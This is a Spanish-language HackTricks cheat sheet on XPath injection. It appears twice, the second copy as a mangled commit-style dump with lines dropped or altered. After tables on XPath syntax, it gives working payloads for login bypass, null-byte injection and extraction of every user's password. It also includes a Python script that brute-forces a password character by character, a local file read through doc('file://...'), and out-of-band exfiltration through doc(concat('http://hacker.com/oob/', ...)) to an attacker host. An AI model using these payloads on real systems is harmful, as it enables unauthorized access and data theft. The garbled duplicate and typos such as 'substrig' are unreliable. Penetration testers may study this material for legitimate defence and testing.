hacktricks/pentesting-web/xpath-injection.md

# Inyección de XPATH

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>

[**Sigue a HackenProof**](https://bit.ly/3xrrDrL) **para aprender más sobre errores web3**

🐞 Lee tutoriales sobre errores web3

🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores

💬 Participa en discusiones comunitarias

## **Sintaxis básica**

La inyección de XPATH es una técnica de ataque utilizada para explotar aplicaciones que construyen consultas XPATH (Lenguaje de ruta XML) a partir de la entrada suministrada por el usuario para consultar o navegar por documentos XML.

Información sobre cómo hacer consultas: [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp)

### Nodos

| Expresión | Descripción                                                                                           |
| ---------- | ----------------------------------------------------------------------------------------------------- |
| nodonombre   | Selecciona todos los nodos con el nombre "nodonombre"                                                            |
| /          | Selecciona desde el nodo raíz                                                                            |
| //         | Selecciona nodos en el documento desde el nodo actual que coinciden con la selección sin importar dónde estén |
| .          | Selecciona el nodo actual                                                                              |
| ..         | Selecciona el padre del nodo actual                                                                |
| @          | Selecciona atributos                                                                                    |

### **Ejemplos:**

| Expresión de ruta | Resultado                                                                                                                                 |
| --------------- | -------------------------------------------------------------------------------------------------------------------------------------- |
| librería       | Selecciona todos los nodos con el nombre "librería"                                                                                            |
| /librería      | Selecciona el elemento raíz librería**Nota:** Si la ruta comienza con una barra diagonal ( / ) siempre representa una ruta absoluta a un elemento! |
| librería/libro  | Selecciona todos los elementos libro que son hijos de librería                                                                               |
| //libro          | Selecciona todos los elementos libro sin importar dónde estén en el documento                                                                     |
| librería//libro | Selecciona todos los elementos libro que son descendientes del elemento librería, sin importar dónde estén bajo el elemento librería           |
| //@lang         | Selecciona todos los atributos que se llaman lang                                                                                             |

### Predicados

| Expresión de ruta                     | Resultado                                                                                                                                                                                                                                                                                                         |
| ----------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| /librería/libro\[1]                 | <p>Selecciona el primer elemento libro que es hijo del elemento librería.<strong>Nota:</strong> En IE 5,6,7,8,9 el primer nodo es[0], pero según W3C, es [1]. Para resolver este problema en IE, establezca SelectionLanguage en XPath:</p><p>En JavaScript: xml.setProperty("SelectionLanguage","XPath");</p> |
| /librería/libro\[last()]            | Selecciona el último elemento libro que es hijo del elemento librería                                                                                                                                                                                                                                       |
| /librería/libro\[last()-1]          | Selecciona el penúltimo elemento libro que es hijo del elemento librería                                                                                                                                                                                                                               |
| /librería/libro\[position()<3]      | Selecciona los dos primeros elementos libro que son hijos del elemento librería                                                                                                                                                                                                                                 |
| //título\[@lang]                     | Selecciona todos los elementos título que tienen un atributo llamado lang                                                                                                                                                                                                                                               |
| //título\[@lang='en']                | Selecciona todos los elementos título que tienen un atributo "lang" con un valor de "en"                                                                                                                                                                                                                               |
| /librería/libro\[precio>35.00]       | Selecciona todos los elementos libro del elemento librería que tienen un elemento precio con un valor mayor que 35.00                                                                                                                                                                                               |
| /librería/libro\[precio>35.00]/título | Selecciona todos los elementos título de los elementos libro del elemento librería que tienen un elemento precio con un valor mayor que 35.00                                                                                                                                                                         |

### Nodos desconocidos

| Comodín | Descripción                  |
| -------- | ---------------------------- |
| \*       | Coincide con cualquier nodo de elemento     |
| @\*      | Coincide con cualquier nodo de atributo   |
| node()   | Coincide con cualquier nodo de cualquier tipo |

### **Ejemplos:**

| Expresión de ruta | Resultado                                                                   |
| --------------- | ------------------------------------------------------------------------ |
| /librería/\*   | Selecciona todos los nodos de elementos secundarios del elemento librería             |
| //\*            | Selecciona todos los elementos en el documento                                     |
| //título\[@\*]   | Selecciona todos los elementos título que tienen al menos un atributo de cualquier tipo |

<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>

[**Sigue a HackenProof**](https://bit.ly/3xrrDrL) **para aprender más sobre errores web3**

🐞 Lee tutoriales sobre errores web3

🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores

💬 Participa en discusiones comunitarias

## Ejemplo
```markup
<?xml version="1.0" encoding="ISO-8859-1"?>
<data>
<user>
    <name>pepe</name>
    <password>peponcio</password>
    <account>admin</account>
</user>
<user>
    <name>mark</name>
    <password>m12345</password>
    <account>regular</account>
</user>
<user>
    <name>fino</name>
    <password>fino2</password>
    <account>regular</account>
</user>
</data>
```
### Acceder a la información
```
All names - [pepe, mark, fino]
name
//name
//name/node()
//name/child::node()
user/name
user//name
/user/name
//user/name

All values - [pepe, peponcio, admin, mark, ...]
//user/node()
//user/child::node()


Positions
//user[position()=1]/name #pepe
//user[last()-1]/name #mark
//user[position()=1]/child::node()[position()=2] #peponcio (password)

Functions
count(//user/node()) #3*3 = 9 (count all values)
string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4
substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"
```
### Identificación y robo del esquema
```python
and count(/*) = 1 #root
and count(/*[1]/*) = 2 #count(root) = 2 (a,c)
and count(/*[1]/*[1]/*) = 1 #count(a) = 1 (b)
and count(/*[1]/*[1]/*[1]/*) = 0 #count(b) = 0
and count(/*[1]/*[2]/*) = 3 #count(c) = 3 (d,e,f)
and count(/*[1]/*[2]/*[1]/*) = 0 #count(d) = 0
and count(/*[1]/*[2]/*[2]/*) = 0 #count(e) = 0
and count(/*[1]/*[2]/*[3]/*) = 1 #count(f) = 1 (g)
and count(/*[1]/*[2]/*[3]/[1]*) = 0 #count(g) = 0

#The previous solutions are the representation of a schema like the following
#(at this stage we don't know the name of the tags, but jus the schema)
<root>
    <a>
        <b></b>
    </a>
    <c>
        <d></d>
        <e></e>
        <f>
            <h></h>
        </f>
    </c>
</root>

and name(/*[1]) = "root" #Confirm the name of the first tag is "root"
and substring(name(/*[1]/*[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)

#Stealing the schema via OOB
doc(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
doc-available(concat("http://hacker.com/oob/", name(/*[1]/*[1]), name(/*[1]/*[1]/*[1])))
```
## Bypass de Autenticación

### **Ejemplo de consultas:**
```
string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())
$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';
```
### **Bypass OR en usuario y contraseña (mismo valor en ambos)**
```
' or '1'='1
" or "1"="1
' or ''='
" or ""="
string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())

Select account
Select the account using the username and use one of the previous values in the password field
```
### **Abuso de la inyección nula**
```
Username: ' or 1]%00
```
### **Doble OR en nombre de usuario o en contraseña** (es válido con solo 1 campo vulnerable)

IMPORTANTE: Note que la **"y" es la primera operación realizada**.
```
Bypass with first match
(This requests are also valid without spaces)
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
string(//user[name/text()='' or true() or '' and password/text()='']/account/text())

Select account
'or string-length(name(.))<10 or' #Select account with length(name)<10
'or contains(name,'adm') or' #Select first account having "adm" in the name
'or contains(.,'adm') or' #Select first account having "adm" in the current value
'or position()=2 or' #Select 2º account
string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())

Select account (name known)
admin' or '
admin' or '1'='2
string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())
```
## Extracción de cadenas

La salida contiene cadenas y el usuario puede manipular los valores para buscar:
```
/user/username[contains(., '+VALUE+')]
```

```
') or 1=1 or (' #Get all names
') or 1=1] | //user/password[('')=(' #Get all names and passwords
') or 2=1] | //user/node()[('')=(' #Get all values
')] | //./node()[('')=(' #Get all values
')] | //node()[('')=(' #Get all values
') or 1=1] | //user/password[('')=(' #Get all names and passwords
')] | //password%00 #All names and passwords (abusing null injection)
')]/../*[3][text()!=(' #All the passwords
')] | //user/*[1] | a[(' #The ID of all users
')] | //user/*[2] | a[(' #The name of all users
')] | //user/*[3] | a[(' #The password of all users
')] | //user/*[4] | a[(' #The account of all users
```
## Explotación a ciegas

### **Obtener la longitud de un valor y extraerlo mediante comparaciones:**
```bash
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"

substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)

... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value
```
### **Ejemplo en Python**
```python
import requests, string 

flag = ""
l = 0
alphabet = string.ascii_letters + string.digits + "{}_()"
for i in range(30): 
    r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i)) 
    if ("TRUE_COND" in r.text): 
        l = i 
        break 
print("[+] Password length: " + str(l)) 
for i in range(1, l + 1): #print("[i] Looking for char number " + str(i)) 
    for al in alphabet: 
        r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)
        if ("TRUE_COND" in r.text): 
            flag += al
            print("[+] Flag: " + flag) 
            break
```
### Leer archivo
```python
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
```
## Explotación OOB
```python
doc(concat("http://hacker.com/oob/", RESULTS))
doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))
doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))

#Instead of doc() you can use the function doc-available
doc-available(concat("http://hacker.com/oob/", RESULTS))
#the doc available will respond true or false depending if the doc exists,
#user not(doc-available(...)) to invert the result if you need to
```
### Herramienta automática

{% embed url="https://xcat.readthedocs.io/" %}

## Referencias

{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}

<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>

[**Sigue a HackenProof**](https://bit.ly/3xrrDrL) **para aprender más sobre errores web3**

🐞 Lee tutoriales sobre errores web3

🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores

💬 Participa en discusiones de la comunidad

<details>

<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>

* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Revisa los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
f 2023-06-05 18:33:24 +00:00			`# Inyección de XPATH`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PR al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>`

			`[Sigue a HackenProof](https://bit.ly/3xrrDrL) para aprender más sobre errores web3`

			`🐞 Lee tutoriales sobre errores web3`

			`🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores`

			`💬 Participa en discusiones comunitarias`

			`## Sintaxis básica`

			`La inyección de XPATH es una técnica de ataque utilizada para explotar aplicaciones que construyen consultas XPATH (Lenguaje de ruta XML) a partir de la entrada suministrada por el usuario para consultar o navegar por documentos XML.`

			`Información sobre cómo hacer consultas: [https://www.w3schools.com/xml/xpath\_syntax.asp](https://www.w3schools.com/xml/xpath\_syntax.asp)`

			`### Nodos`

			`\| Expresión \| Descripción \|`
			`\| ---------- \| ----------------------------------------------------------------------------------------------------- \|`
			`\| nodonombre \| Selecciona todos los nodos con el nombre "nodonombre" \|`
			`\| / \| Selecciona desde el nodo raíz \|`
			`\| // \| Selecciona nodos en el documento desde el nodo actual que coinciden con la selección sin importar dónde estén \|`
			`\| . \| Selecciona el nodo actual \|`
			`\| .. \| Selecciona el padre del nodo actual \|`
			`\| @ \| Selecciona atributos \|`

			`### Ejemplos:`

			`\| Expresión de ruta \| Resultado \|`
			`\| --------------- \| -------------------------------------------------------------------------------------------------------------------------------------- \|`
			`\| librería \| Selecciona todos los nodos con el nombre "librería" \|`
			`\| /librería \| Selecciona el elemento raíz libreríaNota: Si la ruta comienza con una barra diagonal ( / ) siempre representa una ruta absoluta a un elemento! \|`
			`\| librería/libro \| Selecciona todos los elementos libro que son hijos de librería \|`
			`\| //libro \| Selecciona todos los elementos libro sin importar dónde estén en el documento \|`
			`\| librería//libro \| Selecciona todos los elementos libro que son descendientes del elemento librería, sin importar dónde estén bajo el elemento librería \|`
			`\| //@lang \| Selecciona todos los atributos que se llaman lang \|`

			`### Predicados`

			`\| Expresión de ruta \| Resultado \|`
			`\| ----------------------------------- \| -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- \|`
			`\| /librería/libro\[1] \| <p>Selecciona el primer elemento libro que es hijo del elemento librería.<strong>Nota:</strong> En IE 5,6,7,8,9 el primer nodo es[0], pero según W3C, es [1]. Para resolver este problema en IE, establezca SelectionLanguage en XPath:</p><p>En JavaScript: xml.setProperty("SelectionLanguage","XPath");</p> \|`
			`\| /librería/libro\[last()] \| Selecciona el último elemento libro que es hijo del elemento librería \|`
			`\| /librería/libro\[last()-1] \| Selecciona el penúltimo elemento libro que es hijo del elemento librería \|`
			`\| /librería/libro\[position()<3] \| Selecciona los dos primeros elementos libro que son hijos del elemento librería \|`
			`\| //título\[@lang] \| Selecciona todos los elementos título que tienen un atributo llamado lang \|`
			`\| //título\[@lang='en'] \| Selecciona todos los elementos título que tienen un atributo "lang" con un valor de "en" \|`
			`\| /librería/libro\[precio>35.00] \| Selecciona todos los elementos libro del elemento librería que tienen un elemento precio con un valor mayor que 35.00 \|`
			`\| /librería/libro\[precio>35.00]/título \| Selecciona todos los elementos título de los elementos libro del elemento librería que tienen un elemento precio con un valor mayor que 35.00 \|`

			`### Nodos desconocidos`

			`\| Comodín \| Descripción \|`
			`\| -------- \| ---------------------------- \|`
			`\| \* \| Coincide con cualquier nodo de elemento \|`
			`\| @\* \| Coincide con cualquier nodo de atributo \|`
			`\| node() \| Coincide con cualquier nodo de cualquier tipo \|`

			`### Ejemplos:`

			`\| Expresión de ruta \| Resultado \|`
			`\| --------------- \| ------------------------------------------------------------------------ \|`
			`\| /librería/\* \| Selecciona todos los nodos de elementos secundarios del elemento librería \|`
			`\| //\* \| Selecciona todos los elementos en el documento \|`
			`\| //título\[@\*] \| Selecciona todos los elementos título que tienen al menos un atributo de cualquier tipo \|`

			`<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>`

			`[Sigue a HackenProof](https://bit.ly/3xrrDrL) para aprender más sobre errores web3`

			`🐞 Lee tutoriales sobre errores web3`

			`🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores`

			`💬 Participa en discusiones comunitarias`

			`## Ejemplo`
			```markup
			`<?xml version="1.0" encoding="ISO-8859-1"?>`
			`<data>`
			`<user>`
			`<name>pepe</name>`
			`<password>peponcio</password>`
			`<account>admin</account>`
			`</user>`
			`<user>`
			`<name>mark</name>`
			`<password>m12345</password>`
			`<account>regular</account>`
			`</user>`
			`<user>`
			`<name>fino</name>`
			`<password>fino2</password>`
			`<account>regular</account>`
			`</user>`
			`</data>`
			```
			`### Acceder a la información`
			```
			`All names - [pepe, mark, fino]`
			`name`
			`//name`
			`//name/node()`
			`//name/child::node()`
			`user/name`
			`user//name`
			`/user/name`
			`//user/name`

			`All values - [pepe, peponcio, admin, mark, ...]`
			`//user/node()`
			`//user/child::node()`


			`Positions`
			`//user[position()=1]/name #pepe`
			`//user[last()-1]/name #mark`
			`//user[position()=1]/child::node()[position()=2] #peponcio (password)`

			`Functions`
			`count(//user/node()) #3*3 = 9 (count all values)`
			`string-length(//user[position()=1]/child::node()[position()=1]) #Length of "pepe" = 4`
			`substrig(//user[position()=2/child::node()[position()=1],2,1) #Substring of mark: pos=2,length=1 --> "a"`
			```
			`### Identificación y robo del esquema`
			```python
			`and count(/*) = 1 #root`
			`and count(/[1]/) = 2 #count(root) = 2 (a,c)`
			`and count(/[1]/[1]/*) = 1 #count(a) = 1 (b)`
			`and count(/[1]/[1]/[1]/) = 0 #count(b) = 0`
			`and count(/[1]/[2]/*) = 3 #count(c) = 3 (d,e,f)`
			`and count(/[1]/[2]/[1]/) = 0 #count(d) = 0`
			`and count(/[1]/[2]/[2]/) = 0 #count(e) = 0`
			`and count(/[1]/[2]/[3]/) = 1 #count(f) = 1 (g)`
			`and count(/[1]/[2]/[3]/[1]) = 0 #count(g) = 0`

			`#The previous solutions are the representation of a schema like the following`
			`#(at this stage we don't know the name of the tags, but jus the schema)`
			`<root>`
			`<a>`
			`<b></b>`
			`</a>`
			`<c>`
			`<d></d>`
			`<e></e>`
			`<f>`
			`<h></h>`
			`</f>`
			`</c>`
			`</root>`

			`and name(/*[1]) = "root" #Confirm the name of the first tag is "root"`
			and substring(name(/[1]/[1]),1,1) = "a" #First char of name of tag `<a>` is "a"
			and string-to-codepoints(substring(name(/[1]/[1]/*),1,1)) = 105 #Firts char of tag `<b>`is codepoint 105 ("i") (https://codepoints.net/)

			`#Stealing the schema via OOB`
			`doc(concat("http://hacker.com/oob/", name(/[1]/[1]), name(/[1]/[1]/*[1])))`
			`doc-available(concat("http://hacker.com/oob/", name(/[1]/[1]), name(/[1]/[1]/*[1])))`
			```
			`## Bypass de Autenticación`

			`### Ejemplo de consultas:`
			```
			`string(//user[name/text()='+VAR_USER+' and password/text()='+VAR_PASSWD+']/account/text())`
			`$q = '/usuarios/usuario[cuenta="' . $_POST['user'] . '" and passwd="' . $_POST['passwd'] . '"]';`
			```
			`### Bypass OR en usuario y contraseña (mismo valor en ambos)`
			```
			`' or '1'='1`
			`" or "1"="1`
			`' or ''='`
			`" or ""="`
			`string(//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']/account/text())`

			`Select account`
			`Select the account using the username and use one of the previous values in the password field`
			```
			`### Abuso de la inyección nula`
			```
			`Username: ' or 1]%00`
			```
			`### Doble OR en nombre de usuario o en contraseña (es válido con solo 1 campo vulnerable)`

			`IMPORTANTE: Note que la "y" es la primera operación realizada.`
			```
			`Bypass with first match`
			`(This requests are also valid without spaces)`
			`' or /* or '`
			`' or "a" or '`
			`' or 1 or '`
			`' or true() or '`
			`string(//user[name/text()='' or true() or '' and password/text()='']/account/text())`

			`Select account`
			`'or string-length(name(.))<10 or' #Select account with length(name)<10`
			`'or contains(name,'adm') or' #Select first account having "adm" in the name`
			`'or contains(.,'adm') or' #Select first account having "adm" in the current value`
			`'or position()=2 or' #Select 2º account`
			`string(//user[name/text()=''or position()=2 or'' and password/text()='']/account/text())`

			`Select account (name known)`
			`admin' or '`
			`admin' or '1'='2`
			`string(//user[name/text()='admin' or '1'='2' and password/text()='']/account/text())`
			```
			`## Extracción de cadenas`

			`La salida contiene cadenas y el usuario puede manipular los valores para buscar:`
			```
			`/user/username[contains(., '+VALUE+')]`
			```

			```
			`') or 1=1 or (' #Get all names`
			`') or 1=1] \| //user/password[('')=(' #Get all names and passwords`
			`') or 2=1] \| //user/node()[('')=(' #Get all values`
			`')] \| //./node()[('')=(' #Get all values`
			`')] \| //node()[('')=(' #Get all values`
			`') or 1=1] \| //user/password[('')=(' #Get all names and passwords`
			`')] \| //password%00 #All names and passwords (abusing null injection)`
			`')]/../*[3][text()!=(' #All the passwords`
			`')] \| //user/*[1] \| a[(' #The ID of all users`
			`')] \| //user/*[2] \| a[(' #The name of all users`
			`')] \| //user/*[3] \| a[(' #The password of all users`
			`')] \| //user/*[4] \| a[(' #The account of all users`
			```
			`## Explotación a ciegas`

			`### Obtener la longitud de un valor y extraerlo mediante comparaciones:`
			```bash
			`' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''=' #True if length equals 4`
			`' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''=' #True is first equals "a"`

			`substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)`

			`... and ( if ( $employee/role = 2 ) then error() else 0 )... #When error() is executed it rises an error and never returns a value`
			```
			`### Ejemplo en Python`
			```python
			`import requests, string`

			`flag = ""`
			`l = 0`
			`alphabet = string.ascii_letters + string.digits + "{}_()"`
			`for i in range(30):`
			`r = requests.get("http://example.com?action=user&userid=2 and string-length(password)=" + str(i))`
			`if ("TRUE_COND" in r.text):`
			`l = i`
			`break`
			`print("[+] Password length: " + str(l))`
			`for i in range(1, l + 1): #print("[i] Looking for char number " + str(i))`
			`for al in alphabet:`
			`r = requests.get("http://example.com?action=user&userid=2 and substring(password,"+str(i)+",1)="+al)`
			`if ("TRUE_COND" in r.text):`
			`flag += al`
			`print("[+] Flag: " + flag)`
			`break`
			```
			`### Leer archivo`
			```python
			`(substring((doc('file://protected/secret.xml')/[1]/[1]/text()[1]),3,1))) < 127`
			```
			`## Explotación OOB`
			```python
			`doc(concat("http://hacker.com/oob/", RESULTS))`
			`doc(concat("http://hacker.com/oob/", /Employees/Employee[1]/username))`
			`doc(concat("http://hacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))`

			`#Instead of doc() you can use the function doc-available`
			`doc-available(concat("http://hacker.com/oob/", RESULTS))`
			`#the doc available will respond true or false depending if the doc exists,`
			`#user not(doc-available(...)) to invert the result if you need to`
			```
			`### Herramienta automática`

			`{% embed url="https://xcat.readthedocs.io/" %}`

			`## Referencias`

			`{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20injection" %}`

			`<figure><img src="../.gitbook/assets/image (7) (2).png" alt=""><figcaption></figcaption></figure>`

			`[Sigue a HackenProof](https://bit.ly/3xrrDrL) para aprender más sobre errores web3`

			`🐞 Lee tutoriales sobre errores web3`

			`🔔 Recibe notificaciones sobre nuevos programas de recompensas por errores`

			`💬 Participa en discusiones de la comunidad`

			`<details>`

			`<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>`

			`* ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Revisa los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Obtén el [swag oficial de PEASS y HackTricks](https://peass.creator-spring.com)`
			`* Únete al [💬](https://emojipedia.org/speech-balloon/) [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter [🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[@carlospolopm](https://twitter.com/hacktricks\_live).`
			`* Comparte tus trucos de hacking enviando PRs al [repositorio de hacktricks](https://github.com/carlospolop/hacktricks) y al [repositorio de hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`